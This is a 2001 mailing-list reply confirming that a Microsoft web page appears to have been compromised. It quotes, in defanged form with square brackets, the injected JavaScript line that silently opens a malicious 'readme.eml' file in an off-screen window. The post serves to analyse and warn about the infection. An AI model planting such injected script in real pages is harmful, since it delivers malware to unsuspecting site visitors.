Re: Please tell me I'm wrong: microsoft.com infected

From: Michael H. Warfield (mhwat_private)
Date: Wed Sep 19 2001 - 14:54:03 PDT

    On Wed, Sep 19, 2001 at 03:37:39PM -0400, Steve Cody wrote:
    > I just went to http://www.microsoft.com/frontpage, and my Symantec
    > Norton Antivirus popped up and denied access to readme.eml.

    > I could not view the source of the loaded page, so I can't verify that
    > it is definitely infected.

    	Yes, indeedie do.  Just did a wget http://www.microsoft.com/frontpage
    and here is what's on da bottom:

    [html][script language="JavaScript"]window.open("readme.eml", null, "resizable=no,top=6000,left=6000")[/script][/html]

    	Defanged by turning angle brackets into square brackets even though
    it's not in an html attachment.  ;-)

    > Steve

     Michael H. Warfield    |  (770) 985-6132   |  mhwat_private
      (The Mad Wizard)      |  (678) 463-0932   |  http://www.wittsend.com/mhw/